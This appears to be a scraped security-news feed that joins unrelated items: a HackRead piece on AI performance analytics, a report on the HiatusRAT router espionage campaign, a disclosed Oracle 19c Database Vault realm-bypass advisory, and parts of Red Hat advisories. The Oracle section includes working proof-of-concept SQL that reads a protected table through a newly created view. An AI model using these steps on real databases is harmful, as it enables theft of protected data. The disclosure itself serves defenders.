x4dcbL6jnnZCEEZ282yGrL4fQWjOdC0bGDrfw7qcCbjeEqKKiPyHffzTu/drDT29  
/EVM/7D12z8=  
=+U7d  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1130-01

By Owais Sultan
Managers are aware that they are being held accountable for their team’s performance. How well their teams do…
This is a post from HackRead.com Read the original post: 4 Things You May Not Know About Performance Analytics Technology

Managers are aware that they are being held accountable for their team’s performance. How well their teams do is a direct reflection of how well they are functioning in their own roles. But for leaders and the companies they work for, finding ways to effectively measure performance can become complicated. It’s also tricky to pinpoint which characteristics will turn a new hire or existing employee into a top performer.

Analytics technology **backed by artificial intelligence** and machine learning stands to change those dynamics. The ability to identify successful qualities and techniques for specific roles is just the beginning.

Analytics technology designed to boost employee performance can also match workers with the right career paths. As companies look for ways to maximize work quality, here are four things to know about analytics technology.

**1\. Managers Can Personalize Suggestions for Improvement**

When it comes to job performance, leaders sometimes see evidence that employees are not meeting the mark. Subpar results are obvious if the position’s responsibilities include specific key performance indicators. Yet, it is not always clear why an individual is not meeting their goals.

Falling short can be frustrating for everyone involved, especially when an employee tries different remedies with little luck. **Performance analytics** programs use four dimensions to identify why someone is not achieving their targets: descriptive, diagnostic, predictive, and prescriptive analytics.

**AI** analyzes historical information and identifies relationships to make recommendations for improvement; for example, if two sales reps aren’t converting enough leads. Analytics technology can pinpoint why this is the case for each of them. Perhaps one rep isn’t contacting a sufficient number of prospects, while the other employee is failing to follow up sufficiently. Managers can offer more beneficial coaching by identifying individual reasons for performance problems.

**2\. Tech Centralizes Objective Sources of Truth**

KPIs are intended to establish objective measurements of performance; however, supervisors are not immune to subjectivity when evaluating their direct reports. Leaders are also known to make hiring decisions based on biases.

For example, four in 10 hiring managers confessed to age bias in a 2022 survey. Consequently, subjective opinions may marginalize potential high performers or, conversely, confer what is known as a “**halo effect**.”

If a leader has a cognitive bias toward a direct report, they are more likely to positively assess the person’s work. With the halo effect, a supervisor may also dismiss the individual’s negative behaviour. Bias, such as the halo effect, can be more problematic in organizations that lack objective targets; however, even in companies with set KPIs, biases may cause supervisors to overlook their importance.   

**Data-driven technology** makes non-subjective performance factors less deniable, streamlining the information. The information becomes centralized, more precise, and consistent. Analytics establish a single source of truth, from which supervisors can assess work outcomes at a glance. In addition, reporting features make it easy to track objective progress toward applicable goals.

**3\. Analytics Can Make Predictions About Job Candidates**

Hiring the right person for a job is a complex decision. Leaders tend to be more familiar with internal candidates than external ones. Even so, hiring managers can’t always predict how successful a specific candidate will perform in various roles.

That’s a problem, as identifying people who are apt to excel in a position impacts more than just their performance in that one job. It could also determine how soon managers will have to go through the hiring process again.

That’s because turnover rates are lower among high-achieving employees. A 2021 Bureau of Labor Statistics **report reveals** (PDF) an average turnover rate of only 3% among top performers. That figure pales in comparison to the 57.3% overall turnover rate. Aggregate voluntary turnover is about 25%, but 29% comes from terminations. The wrong hire can lead to poor results, which may prompt those separations.

Fortunately, analytics programs incorporate predictive models to guide candidate selection processes. These models predict job fit based on data about a company’s current top performers. Hiring managers can be more confident in their decisions and more likely to avoid turnover expenses. Preventing mismatches between jobs and candidates also prevents losses from substandard work quality.

**4\. Companies Keep Control of Benchmarks**

Many professionals have fears about **AI taking over**; they are anxious that the technology will replace their jobs. As with most solutions backed by artificial intelligence, though, analytics platforms won’t replace people per see.

Instead, the software will transform how companies function; it’s still up to humans to figure out what goals they want to strive toward. Leaders will continue to set the benchmarks, modifying them as the business needs of companies change.

For instance, say performance analytics technology reveals that employees’ productivity is dropping below acceptable levels. The platform shows that the decline is happening due to too much variability in workers’ shifts. One day, employees come in from 8 a.m. to 5 p.m., and the next from 5 p.m. to 11 p.m. To get productivity back on track, managers can rely on the guidance the data provides.

In response to the new intelligence, managers can adjust employees’ schedules so they are working more consistent shifts. Over the next few months, reports may reveal that productivity levels are climbing past pre-established benchmarks. AI may direct companies toward potential solutions to performance issues, but it won’t create the goals.

**Taking Advantage of Data-Driven Tech**

What drives individual employees to perform might be unique, but managers are responsible for the results their direct reports produce. Good or bad, employee performance impacts a company’s ability. Falling short of business objectives is something neither workers nor leaders want to see.

At the same time, pinpointing why someone did not meet expectations can be a mystery. Data-driven technology can help provide the answers. Whether the issue is insufficient training or a poor job fit, analytics reveal why. With this guidance, leaders can increase the accuracy of their recommendations, decisions, and adjustments.

1.  **Advertising Strategies For PaaS Services**
2.  **How AI-Powered Tools Can Spark Creativity**
3.  **AI-based model predicts extreme wildfire danger**
4.  **How Data Analytics and AI Solve Global Problems**

4 Things You May Not Know About Performance Analytics Technology

Two novel malware binaries, including "HiatusRAT," offer unique capabilities that point to the need for better security for companies' router infrastructure.

A cyber-espionage campaign featuring novel malware has been uncovered, targeting DrayTek routers at medium-sized businesses worldwide.

Unlike most spyware efforts, this campaign, dubbed "Hiatus" by Lumen Black Lotus Labs, has dual goals: to steal data in targeted attacks and to co-opt routers to become part of a covert command-and-control (C2) infrastructure for mounting hard-to-trace proxy campaigns.

The threat actors use known vulnerabilities to target DrayTek Vigor models 2960 and 3900 running an i368 architecture, according to an analysis this week on Hiatus from Black Lotus. Once the attackers achieve compromise, they can plant two unique, malicious binaries on the routers. 

The first is an espionage utility called tcpdump, which monitors router traffic on ports associated with email and file-transfer communications on the victim's adjacent LAN. It has the ability to passively collect this cleartext email content as it transits the router.

"More established, medium-size businesses run their own mail servers, and sometimes have dedicated internet lines," according to the report. "These networks utilize DrayTek routers as the gateway to their corporate network, which routes traffic from email servers on the LAN to the public internet."

The second binary is a remote access Trojan (RAT) called HiatusRAT, which allows cyberattackers to remotely interact with the routers, download files, or run arbitrary commands. It also has a set of prebuilt functions, including two proxy functions that the threat actors can use to control other malware infection clusters via an infected Hiatus victim's machine.

**HiatusRAT's Proxy Functions**

The two proxy commands are "purpose-built to enable obfuscated communications from other machines (like those infected with another RAT) through the Hiatus victims," according to the Black Lotus report.

They are:

*   **socks5:** Sets up a SOCKS version 5 proxy on the compromised router.
*   **tcp\_forward:** For proxy control, this takes a specified listening port, forwarding IP, and forwarding port and transmits any TCP data that was sent to the listening port on the compromised host to the forwarding location. It establishes two threads to allow for bidirectional communications between the sender and the specified forwarding IP.

The ability to turn the router into a SOCKS5 proxy device "allows the threat actor to interact with malicious, passive backdoors such as Web shells via infected routers as a midpoint," explains Danny Adamitis, principal threat researcher for Lumen Black Lotus. "Using a compromised router as the communications for backdoors and Web shells enables the threat actors to bypass geo-fencing-based defense measures and avoid being flagged on network-based detection tools."

The TCP function, meanwhile, has likely been designed to forward beacons or interact with other RATs on other infected machines, which would "allow the router to be a C2 IP address for malware on a separate device," according to the report.

All of this means that organizations shouldn't underestimate their worth as a target, the report noted: "Anyone with a router who uses the internet can potentially be a target for Hiatus — they can be used as proxy for another campaign — even if the entity that owns the router does not view themselves as an intelligence target."

**Varied Types of Hiatus Victims**

The campaign is unusually small, having infected only around 100 victims, mainly in Europe and Latin America.

"This is approximately 2% of the total number of DrayTek 2960 and 3900 routers that are currently exposed to the Internet," according to Adamitis. "This suggests the threat actor is intentionally maintaining a minimal footprint to limit their exposure and maintain critical points of presence."

In terms of espionage, some of the victims are "targets of enablement," says the researcher, and include IT service and consulting firms.

"We believe the threat actors target these organizations to gain access to sensitive information about their customers’ environments," using the scraped email communications to mount downstream attacks, Adamitis says.

He adds that a second grouping of victims can be considered targets of direct interest for data theft, "which included municipal government entities and some organizations involved in the energy sector."

While the number of primary victims is small, the scope of the data theft suggests an advanced persistent threat as the culprit behind Hiatus.

"Based upon the amount of data that would be collected from these accesses, it leads us to believe that the actor is well resourced and is capable of processing large volumes of data, suggesting a state-backed actor," Adamitis notes.

**What to Learn From Hiatus**

The key takeaway for businesses is that the conventional idea of perimeter security needs to be adapted to include routers.

"The benefits of using routers for data collection are that they are unmonitored, and all traffic passes through them," Adamitis explains. "This stands in contrast to Windows machines and mail servers, which usually have endpoint detection and response (EDR) and firewall protections deployed in enterprise networks. This lack of monitoring allows the threat actor to collect the same information that would be achieved without directly interacting with any assets that might have EDR products pre-installed on them."

To protect themselves, businesses need to make sure that routers are "routinely checked, monitored, and patched like any other perimeter device," he says.

Organizations should take action: The Hiatus binaries were first seen last July, with new infections continuing up to at least mid-February. The attacks use version 1.5 of the malware, indicating that there could have been activity using version 1.0 prior to July. Black Lotus said that it fully expects the activity to continue.

Hiatus Campaign Infects DrayTek Routers for Cyber Espionage, Proxy Control

Oracle Database Vault had a flaw that would allow unauthorized privileged users to extract data from a protected table. Oracle 19c versions 19.18 and below are affected. Fixed in the Oracle Critical Patch Update October 2022.

Title: Oracle Database Vault Protected Table With Realm Data Extraction Vulnerability  
Product:                   Database  
Manufacturer:              Oracle  
Affected Version(s):       19c [19.18 and below]  
Risk Level:                Medium  
Solution Status:           Fixed in Oracle Critical Patch Update October 2022 [back-port patch for 21c version]  
CVE Reference:             N/A, Patch Backported in Oracle CPU OCT 2022...fixed in Oracle 21c release on-wards  
Author of Advisory:        Emad Al-Mousa

Overview:

Oracle Database Vault is a security feature that provides controls to prevent unauthorized privileged users from accessing sensitive data, prevent unauthorized database changes, and helps customers meet industry, regulatory, or corporate security standards.

*****************************************  
Vulnerability Details:

data extraction/exfiltration of a sensitive table that is protected with a security realm was possible by privileged account. The DB vault is designed to protect against privileged accounts being able to access confidential data !!

*****************************************  
Proof of Concept (PoC):

A sensitive table called “HR.sensitive_table” in PDB1 under HR schema will be protected with REALM through the following steps:

sqlplus c##dbv_owner_root_backup/dbv_2020@PDB1

SQL> begin  
DBMS_MACADM.CREATE_REALM (  
realm_name=> 'HR Access Protection',  
description=> 'HR schema in PDB1',  
enabled=> DBMS_MACUTL.G_YES,  
audit_options=> DBMS_MACUTL.G_REALM_AUDIT_FAIL,  
realm_type=> 1);   
end;   
/

SQL> begin  
DBMS_MACADM.ADD_OBJECT_TO_REALM(  
realm_name=> 'HR Access Protection',  
object_owner=> 'HR',  
object_name=> 'sensitive_table',  
object_type=> 'TABLE');   
end;  
 /

SQL>  begin  
DBMS_MACADM.ADD_AUTH_TO_REALM(  
realm_name=> 'HR Access Protection',  
grantee=> 'HR',  
auth_options=> DBMS_MACUTL.G_REALM_AUTH_OWNER);  
end;   
/

Now as SYS user I shouldn’t be able to view the data of table HR.sensitive_table as expected…..However I was able to create a view under HR schema to “extract” the confidential data !

So, the exploit was basically executing the following two SQL statements (view creation of the protected realm table and then viewing the data from the view. The exploit required two system privileges: create any view, select any view)

SQL> create or replace view HR.DUMMY_V as select * from HR.sensitive_table;

SQL> select * from HR.DUMMY_V;

Per documentation to revoke DDL authorization, you can use DBMS_MACADM.UNAUTHORIZE_DDL procedure:

https://docs.oracle.com/database/121/DVADM/release_changes.htm#DVADM70086

based on that let us simulate:

ORACLE19c > sqlplus c##dbv_owner_root_backup/XXXXXXX@PDB1

SQL> select * from DBA_DV_DDL_AUTH;

GRANTEE  
——————————————————————————–  
SCHEMA  
——————————————————————————–  
%  
%

SQL> exec DBMS_MACADM.UNAUTHORIZE_DDL(‘SYS’,’HR’);  
BEGIN DBMS_MACADM.UNAUTHORIZE_DDL(‘SYS’,’HR’); END;

*  
ERROR at line 1:  
ORA-47974: Oracle DDL authorization for Oracle Database Vault to SYS on schema  
HR is not found.  
ORA-06512: at “DVSYS.DBMS_MACADM”, line 1435  
ORA-06512: at “DVSYS.DBMS_MACADM”, line 1678  
ORA-06512: at line 1

SQL> EXEC DBMS_MACADM.UNAUTHORIZE_DDL(‘SYS’, ‘%’);  
BEGIN DBMS_MACADM.UNAUTHORIZE_DDL(‘SYS’, ‘%’); END;

*  
ERROR at line 1:  
ORA-47974: Oracle DDL authorization for Oracle Database Vault to SYS on schema  
% is not found.  
ORA-06512: at “DVSYS.DBMS_MACADM”, line 1435  
ORA-06512: at “DVSYS.DBMS_MACADM”, line 1678  
ORA-06512: at line 1

Then, i tried to execute the same procedure for SYSTEM account:

SQL> EXEC DBMS_MACADM.UNAUTHORIZE_DDL(‘SYSTEM’, ‘%’);  
BEGIN DBMS_MACADM.UNAUTHORIZE_DDL(‘SYSTEM’, ‘%’); END;

*  
ERROR at line 1:  
ORA-47974: Oracle DDL authorization for Oracle Database Vault to SYSTEM on  
schema % is not found.  
ORA-06512: at “DVSYS.DBMS_MACADM”, line 1435  
ORA-06512: at “DVSYS.DBMS_MACADM”, line 1678  
ORA-06512: at line 1

SQL> EXEC DBMS_MACADM.UNAUTHORIZE_DDL(‘SYSTEM’, ‘HR’);  
BEGIN DBMS_MACADM.UNAUTHORIZE_DDL(‘SYSTEM’, ‘HR’); END;

*  
ERROR at line 1:  
ORA-47974: Oracle DDL authorization for Oracle Database Vault to SYSTEM on  
schema HR is not found.  
ORA-06512: at “DVSYS.DBMS_MACADM”, line 1435  
ORA-06512: at “DVSYS.DBMS_MACADM”, line 1678  
ORA-06512: at line 1

For the sake of illustration, i granted SYSTEM account DDL authorization to see if the view is updated ( and view was updated successfully):

SQL> EXEC DBMS_MACADM.AUTHORIZE_DDL(‘SYSTEM’, ‘HR’);

PL/SQL procedure successfully completed.

SQL> select * from DBA_DV_DDL_AUTH;

GRANTEE  
——————————————————————————–  
SCHEMA  
——————————————————————————–  
%  
%

SYSTEM  
HR

After that i have removed the DDL authorization as shown below:

SQL> EXEC DBMS_MACADM.UNAUTHORIZE_DDL(‘SYSTEM’, ‘HR’);

PL/SQL procedure successfully completed.

SQL> select * from DBA_DV_DDL_AUTH;

GRANTEE                                                                                                                          SCHEMA  
——————————————————————————————————————————– ——————————————————————————————————————————–  
%   %

This doesn’t make any difference as SYSTEM account as shown below will still be able to create the view even though  DBMS_MACADM.UNAUTHORIZE_DDL was executed successfully:                                                                                                                            

ORACLE19c > sqlplus system/XXXXX@PDB1

SQL> select * from HR.sensitive_table;  
select * from HR.sensitive_table  
                 *  
ERROR at line 1:  
ORA-01031: insufficient privileges

SQL> create or replace view HR.sensitive_table3c as select * from HR.sensitive_table;

View created.

SQL> select * from HR.sensitive_table3c ;

FNAME      LNAME      EXECUTIVE_COMPENSATION  
———- ———- ——————————  
MRIO       BASIL      1200000  
Thomas     Raynold    1100000  
Jessica    Rodrigo    3200000

*****************************************  
- Defensive Techniques:

configure security auditing.  
ensure database accounts have strong passwords, and rotate passwords regularly if possible.  
pro-actively patch your systems and database systems.

*****************************************  
References:  
https://databasesecurityninja.wordpress.com/2023/03/07/oracle-database-vault-protected-table-with-realm-data-extraction-vulnerability/  
https://docs.oracle.com/database/121/DVADM/release_changes.htm#DVADM70086  
https://www.oracle.com/security-alerts/cpuoct2022.html

Oracle 19c Access Bypass

Red Hat Security Advisory 2023-1090-01 - Samba is an open-source implementation of the Server Message Block protocol and the related Common Internet File System protocol, which allow PC-compatible machines to share files, printers, and various information.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: samba security update  
Advisory ID:       RHSA-2023:1090-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1090  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-38023  
====================================================================  
1. Summary:

An update for samba is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Resilient Storage (v. 7) - ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

Samba is an open-source implementation of the Server Message Block (SMB)  
protocol and the related Common Internet File System (CIFS) protocol, which  
allow PC-compatible machines to share files, printers, and various  
information.

Security Fix(es):

* samba: RC4/HMAC-MD5 NetLogon Secure Channel is weak and should be avoided  
(CVE-2022-38023)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the smb service will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2154362 - CVE-2022-38023 samba: RC4/HMAC-MD5 NetLogon Secure Channel is weak and should be avoided

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
samba-4.10.16-24.el7_9.src.rpm

noarch:  
samba-common-4.10.16-24.el7_9.noarch.rpm

x86_64:  
libsmbclient-4.10.16-24.el7_9.i686.rpm  
libsmbclient-4.10.16-24.el7_9.x86_64.rpm  
libwbclient-4.10.16-24.el7_9.i686.rpm  
libwbclient-4.10.16-24.el7_9.x86_64.rpm  
samba-client-4.10.16-24.el7_9.x86_64.rpm  
samba-client-libs-4.10.16-24.el7_9.i686.rpm  
samba-client-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-common-libs-4.10.16-24.el7_9.i686.rpm  
samba-common-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-common-tools-4.10.16-24.el7_9.x86_64.rpm  
samba-debuginfo-4.10.16-24.el7_9.i686.rpm  
samba-debuginfo-4.10.16-24.el7_9.x86_64.rpm  
samba-krb5-printing-4.10.16-24.el7_9.x86_64.rpm  
samba-libs-4.10.16-24.el7_9.i686.rpm  
samba-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-clients-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-modules-4.10.16-24.el7_9.i686.rpm  
samba-winbind-modules-4.10.16-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:  
samba-pidl-4.10.16-24.el7_9.noarch.rpm

x86_64:  
libsmbclient-devel-4.10.16-24.el7_9.i686.rpm  
libsmbclient-devel-4.10.16-24.el7_9.x86_64.rpm  
libwbclient-devel-4.10.16-24.el7_9.i686.rpm  
libwbclient-devel-4.10.16-24.el7_9.x86_64.rpm  
samba-4.10.16-24.el7_9.x86_64.rpm  
samba-dc-4.10.16-24.el7_9.x86_64.rpm  
samba-dc-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-debuginfo-4.10.16-24.el7_9.i686.rpm  
samba-debuginfo-4.10.16-24.el7_9.x86_64.rpm  
samba-devel-4.10.16-24.el7_9.i686.rpm  
samba-devel-4.10.16-24.el7_9.x86_64.rpm  
samba-python-4.10.16-24.el7_9.i686.rpm  
samba-python-4.10.16-24.el7_9.x86_64.rpm  
samba-python-test-4.10.16-24.el7_9.x86_64.rpm  
samba-test-4.10.16-24.el7_9.x86_64.rpm  
samba-test-libs-4.10.16-24.el7_9.i686.rpm  
samba-test-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-vfs-glusterfs-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-krb5-locator-4.10.16-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
samba-4.10.16-24.el7_9.src.rpm

noarch:  
samba-common-4.10.16-24.el7_9.noarch.rpm

x86_64:  
libsmbclient-4.10.16-24.el7_9.i686.rpm  
libsmbclient-4.10.16-24.el7_9.x86_64.rpm  
libwbclient-4.10.16-24.el7_9.i686.rpm  
libwbclient-4.10.16-24.el7_9.x86_64.rpm  
samba-client-4.10.16-24.el7_9.x86_64.rpm  
samba-client-libs-4.10.16-24.el7_9.i686.rpm  
samba-client-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-common-libs-4.10.16-24.el7_9.i686.rpm  
samba-common-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-common-tools-4.10.16-24.el7_9.x86_64.rpm  
samba-debuginfo-4.10.16-24.el7_9.i686.rpm  
samba-debuginfo-4.10.16-24.el7_9.x86_64.rpm  
samba-libs-4.10.16-24.el7_9.i686.rpm  
samba-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-clients-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-modules-4.10.16-24.el7_9.i686.rpm  
samba-winbind-modules-4.10.16-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

noarch:  
samba-pidl-4.10.16-24.el7_9.noarch.rpm

x86_64:  
libsmbclient-devel-4.10.16-24.el7_9.i686.rpm  
libsmbclient-devel-4.10.16-24.el7_9.x86_64.rpm  
libwbclient-devel-4.10.16-24.el7_9.i686.rpm  
libwbclient-devel-4.10.16-24.el7_9.x86_64.rpm  
samba-4.10.16-24.el7_9.x86_64.rpm  
samba-dc-4.10.16-24.el7_9.x86_64.rpm  
samba-dc-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-debuginfo-4.10.16-24.el7_9.i686.rpm  
samba-debuginfo-4.10.16-24.el7_9.x86_64.rpm  
samba-devel-4.10.16-24.el7_9.i686.rpm  
samba-devel-4.10.16-24.el7_9.x86_64.rpm  
samba-krb5-printing-4.10.16-24.el7_9.x86_64.rpm  
samba-python-4.10.16-24.el7_9.i686.rpm  
samba-python-4.10.16-24.el7_9.x86_64.rpm  
samba-python-test-4.10.16-24.el7_9.x86_64.rpm  
samba-test-4.10.16-24.el7_9.x86_64.rpm  
samba-test-libs-4.10.16-24.el7_9.i686.rpm  
samba-test-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-vfs-glusterfs-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-krb5-locator-4.10.16-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
samba-4.10.16-24.el7_9.src.rpm

noarch:  
samba-common-4.10.16-24.el7_9.noarch.rpm

ppc64:  
libsmbclient-4.10.16-24.el7_9.ppc.rpm  
libsmbclient-4.10.16-24.el7_9.ppc64.rpm  
libwbclient-4.10.16-24.el7_9.ppc.rpm  
libwbclient-4.10.16-24.el7_9.ppc64.rpm  
samba-4.10.16-24.el7_9.ppc64.rpm  
samba-client-4.10.16-24.el7_9.ppc64.rpm  
samba-client-libs-4.10.16-24.el7_9.ppc.rpm  
samba-client-libs-4.10.16-24.el7_9.ppc64.rpm  
samba-common-libs-4.10.16-24.el7_9.ppc.rpm  
samba-common-libs-4.10.16-24.el7_9.ppc64.rpm  
samba-common-tools-4.10.16-24.el7_9.ppc64.rpm  
samba-debuginfo-4.10.16-24.el7_9.ppc.rpm  
samba-debuginfo-4.10.16-24.el7_9.ppc64.rpm  
samba-krb5-printing-4.10.16-24.el7_9.ppc64.rpm  
samba-libs-4.10.16-24.el7_9.ppc.rpm  
samba-libs-4.10.16-24.el7_9.ppc64.rpm  
samba-winbind-4.10.16-24.el7_9.ppc64.rpm  
samba-winbind-clients-4.10.16-24.el7_9.ppc64.rpm  
samba-winbind-modules-4.10.16-24.el7_9.ppc.rpm  
samba-winbind-modules-4.10.16-24.el7_9.ppc64.rpm

ppc64le:  
libsmbclient-4.10.16-24.el7_9.ppc64le.rpm  
libwbclient-4.10.16-24.el7_9.ppc64le.rpm  
samba-4.10.16-24.el7_9.ppc64le.rpm  
samba-client-4.10.16-24.el7_9.ppc64le.rpm  
samba-client-libs-4.10.16-24.el7_9.ppc64le.rpm  
samba-common-libs-4.10.16-24.el7_9.ppc64le.rpm  
samba-common-tools-4.10.16-24.el7_9.ppc64le.rpm  
samba-debuginfo-4.10.16-24.el7_9.ppc64le.rpm  
samba-krb5-printing-4.10.16-24.el7_9.ppc64le.rpm  
samba-libs-4.10.16-24.el7_9.ppc64le.rpm  
samba-winbind-4.10.16-24.el7_9.ppc64le.rpm  
samba-winbind-clients-4.10.16-24.el7_9.ppc64le.rpm  
samba-winbind-modules-4.10.16-24.el7_9.ppc64le.rpm

s390x:  
libsmbclient-4.10.16-24.el7_9.s390.rpm  
libsmbclient-4.10.16-24.el7_9.s390x.rpm  
libwbclient-4.10.16-24.el7_9.s390.rpm  
libwbclient-4.10.16-24.el7_9.s390x.rpm  
samba-4.10.16-24.el7_9.s390x.rpm  
samba-client-4.10.16-24.el7_9.s390x.rpm  
samba-client-libs-4.10.16-24.el7_9.s390.rpm  
samba-client-libs-4.10.16-24.el7_9.s390x.rpm  
samba-common-libs-4.10.16-24.el7_9.s390.rpm  
samba-common-libs-4.10.16-24.el7_9.s390x.rpm  
samba-common-tools-4.10.16-24.el7_9.s390x.rpm  
samba-debuginfo-4.10.16-24.el7_9.s390.rpm  
samba-debuginfo-4.10.16-24.el7_9.s390x.rpm  
samba-krb5-printing-4.10.16-24.el7_9.s390x.rpm  
samba-libs-4.10.16-24.el7_9.s390.rpm  
samba-libs-4.10.16-24.el7_9.s390x.rpm  
samba-winbind-4.10.16-24.el7_9.s390x.rpm  
samba-winbind-clients-4.10.16-24.el7_9.s390x.rpm  
samba-winbind-modules-4.10.16-24.el7_9.s390.rpm  
samba-winbind-modules-4.10.16-24.el7_9.s390x.rpm

x86_64:  
libsmbclient-4.10.16-24.el7_9.i686.rpm  
libsmbclient-4.10.16-24.el7_9.x86_64.rpm  
libwbclient-4.10.16-24.el7_9.i686.rpm  
libwbclient-4.10.16-24.el7_9.x86_64.rpm  
samba-4.10.16-24.el7_9.x86_64.rpm  
samba-client-4.10.16-24.el7_9.x86_64.rpm  
samba-client-libs-4.10.16-24.el7_9.i686.rpm  
samba-client-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-common-libs-4.10.16-24.el7_9.i686.rpm  
samba-common-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-common-tools-4.10.16-24.el7_9.x86_64.rpm  
samba-debuginfo-4.10.16-24.el7_9.i686.rpm  
samba-debuginfo-4.10.16-24.el7_9.x86_64.rpm  
samba-krb5-printing-4.10.16-24.el7_9.x86_64.rpm  
samba-libs-4.10.16-24.el7_9.i686.rpm  
samba-libs-4.10.16-24.el7_9.x86_64.rpm  
samba-python-4.10.16-24.el7_9.i686.rpm  
samba-python-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-clients-4.10.16-24.el7_9.x86_64.rpm  
samba-winbind-modules-4.10.16-24.el7_9.i686.rpm  
samba-winbind-modules-4.10.16-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Resilient Storage (v. 7):

ppc64le:  
ctdb-4.10.16-24.el7_9.ppc64le.rpm  
ctdb-tests-4.10.16-24.el7_9.ppc64le.rpm  
samba-debuginfo-4.10.16-24.el7_9.ppc64le.rpm

s390x:  
ctdb-4.10.16-24.el7_9.s390x.rpm  
ctdb-tests-4.10.16-24.el7_9.s390x.rpm  
samba-debuginfo-4.10.16-24.el7_9.s390x.rpm

x86_64:  
ctdb-4.10.16-24.el7_9.x86_64.rpm  
ctdb-tests-4.10.16-24.el7_9.x86_64.rpm  
samba-debuginfo-4.10.16-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
samba-pidl-4.10.16-24.el7_9.noarch.rpm

ppc64:  
libsmbclient-devel-4.10.16-24.el7_9.ppc.rpm  
libsmbclient-devel-4.10.16-24.el7_9.ppc64.rpm  
libwbclient-devel-4.10.16-24.el7_9.ppc.rpm  
libwbclient-devel-4.10.16-24.el7_9.ppc64.rpm  
samba-dc-4.10.16-24.el7_9.ppc64.rpm  
samba-dc-libs-4.10.16-24.el7_9.ppc64.rpm  
samba-debuginfo-4.10.16-24.el7_9.ppc.rpm  
samba-debuginfo-4.10.16-24.el7_9.ppc64.rpm  
samba-devel-4.10.16-24.el7_9.ppc.rpm  
samba-devel-4.10.16-24.el7_9.ppc64.rpm  
samba-python-4.10.16-24.el7_9.ppc.rpm  
samba-python-4.10.16-24.el7_9.ppc64.rpm  
samba-python-test-4.10.16-24.el7_9.ppc64.rpm  
samba-test-4.10.16-24.el7_9.ppc64.rpm  
samba-test-libs-4.10.16-24.el7_9.ppc.rpm  
samba-test-libs-4.10.16-24.el7_9.ppc64.rpm  
samba-winbind-krb5-locator-4.10.16-24.el7_9.ppc64.rpm

ppc64le:  
libsmbclient-devel-4.10.16-24.el7_9.ppc64le.rpm  
libwbclient-devel-4.10.16-24.el7_9.ppc64le.rpm  
samba-dc-4.10.16-24.el7_9.ppc64le.rpm  
samba-dc-libs-4.10.16-24.el7_9.ppc64le.rpm  
samba-debuginfo-4.10.16-24.el7_9.ppc64le.rpm  
samba-devel-4.10.16-24.el7_9.ppc64le.rpm  
samba-python-4.10.16-24.el7_9.ppc64le.rpm  
samba-python-test-4.10.16-24.el7_9.ppc64le.rpm  
samba-test-4.10.16-24.el7_9.ppc64le.rpm  
samba-test-libs-4.10.16-24.el7_9.ppc64le.rpm  
samba-winbind-krb5-locator-4.10.16-24.el7_9.ppc64le.rpm

s390x:  
libsmbclient-devel-4.10.16-24.el7_9.s390.rpm  
libsmbclient-devel-4.10.16-24.el7_9.s390x.rpm  
libwbclient-devel-4.10.16-24.el7_9.s390.rpm  
libwbclient-devel-4.10.16-24.el7_9.s390x.rpm  
samba-dc-4.10.16-24.el7_9.s390x.rpm  
samba-dc-libs-4.10.16-24.el7_9.s390x.rpm  
samba-debuginfo-4.10.16-24.el7_9.s390.rpm  
samba-debuginfo-4.10.16-24.el7_9.s390x.rpm  
samba-devel-4.10.16-24.el7_9.s390.rpm  
